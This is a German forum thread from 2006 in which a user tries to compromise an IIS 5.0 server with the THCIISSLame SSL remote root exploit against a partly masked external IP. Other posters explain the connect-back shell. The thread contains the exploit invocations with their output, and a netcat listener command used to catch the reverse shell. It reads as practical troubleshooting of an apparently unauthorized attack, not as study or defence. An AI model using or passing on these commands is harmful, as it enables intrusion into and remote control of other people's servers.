#1 10. August 2006 Ich habe heute versucht einen iis 5 server mittels ssl exploit zu hacken: iis5ssl 66.196.xxx.xxx 127.0.0.1 1234 THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit tested on Windows 2000 Server german/english SP4 by Johnny Cyberpunk (jcyberpunk@thc.org) [*] building buffer [*] connecting the target [*] exploit send [*] waiting for shell dan hab ich über telnet auf localhost 1234 verbunden: [*] Exploit successful ! Have fun ! [*] -------------------------------------------------------------------- Jedoch kahm da nur ein schwarzes bild und die eingabe hat nicht funktioniert. Wie verwende ich diesen Exploit richtig? + Multi-Zitat Zitieren
#2 10. August 2006 is das ne rerverse shell? weil dann musste die ja irgendwie "abfangen" ^^ + Multi-Zitat Zitieren
#3 10. August 2006 hab ich auch gedacht, aber wenn ich eine shell auf dem port eröffne, bekomme ich einen bind error + Multi-Zitat Zitieren
#4 11. August 2006 OMG! Das is ne connectback shell. Also die zu dir connectet, ergo NICHT localhost angeben.... omg sondern deine ip und dann netcat anschmeißen. + Multi-Zitat Zitieren
#5 11. August 2006 kommt aufs gleiche raus. Ich geb meine online ip an (port 666 ist weitergeleitet) und Netcat is auf 666 (nc -l -vv -p 666) eingestellt: D:\Hacking\expl0its\iis5>iis5ssl 66.196.XXX.XXX 84.170.XXX.XXX 666 THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit tested on Windows 2000 Server german/english SP4 by Johnny Cyberpunk (jcyberpunk@thc.org) [*] building buffer [*] connecting the target [*] exploit send bind error() 10048 + Multi-Zitat Zitieren